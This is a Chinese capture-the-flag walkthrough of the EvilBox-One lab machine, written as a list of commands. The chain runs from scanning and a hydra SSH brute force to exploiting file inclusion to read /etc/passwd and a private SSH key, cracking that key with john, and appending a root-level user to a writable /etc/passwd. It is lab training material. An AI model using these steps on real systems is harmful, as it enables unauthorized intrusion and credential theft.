EvilBox---One靶机过程

EvilBox—One

1. 扫IPnetdiscover -i eth0 -r 192.168.70.0/24
   

2. 详细扫nmap -A 192.168.70.150
   

3. 访问IP
   

4. 扫描路径dirb http://192.168.70.150
   

5. 访问一遍
   

6. 尝试爆破hydra -l H4x0r -P top1000.txt ssh://192.168.70.150,失败

7. 查看更深路径dirb http://192.168.70.150/secret/,是空
   

8. 利用gobuster再试一下gobuster dir -w directory-list-1.0.txt -x html -u http://192.168.70.150/secret/ -x txt,php,jsp
   

9. 运用模糊测试看是否有路径wfuzz -c -w /usr/share/wordlists/wfuzz/general/megabeast.txt -u http://192.168.70.150/secret/evil.php?FUZZ=/etc/passwd --hh 0
   

10. 访问http://192.168.70.150/secret/evil.php?command=/etc/passwd
    

11. 因为扫描到ssh服务,所以看用户有没有id_rsahttp://192.168.70.150/secret/evil.php?command=/home/mowree/.ssh/id_rsa
    

12. 拿到authorized_keys,http://192.168.70.150/secret/evil.php?command=/home/mowree/.ssh/authorized_keys,改域名为ip

13. 将id_rsa和authorized_keys放到/root/.ssh目录下
    

      authorized_keys
    
      我们需要本地机器ssh访问远程服务器时为了减少输入密码的步骤，基本上都会在本地机器生成ssh公钥，然后将本地ssh公钥复制到远程服务器的.ssh/authorized_keys中，这样就可以免密登录了。（ 服务器之间访问同理）。
    

14. 提取密钥ssh2john id_rsa > PK.txt

15. john解密john PK.txt,拿到密码unicorn
    

16. 登录ssh mowree@192.168.70.150

17. 拿flag156Rbp0soobpzWSVzKh9YOvzGLgtPZQ
    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

18. 使用hash-identifier查看加密类型=>无

19. 查看内核版本uname -a/cat /proc/version

    Linux EvilBoxOne 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64 GNU/Linux
    

20. 查看系统版本cat /etc/issue
    

21. find / -perm -4000 2>/dev/null
    

22. find / -perm -2000 2>/dev/null
    

23. searchsploit linux 4.19没什么漏洞

24. 查找拥有写权限的文件find / -writable 2>/dev/null | grep -v proc
    

25. 创建密码openssl passwd -1 123456,-l代表md5加密
    $1$YyfR0cZr$u2sqIsJObwKadVj8z69UK1

26. 添加新用户echo 'test:$1$YyfR0cZr$u2sqIsJObwKadVj8z69UK1:0:0::/root:/bin/bash' >>/etc/passwd

27. 切换用户su test

28. 到根目录下拿flag2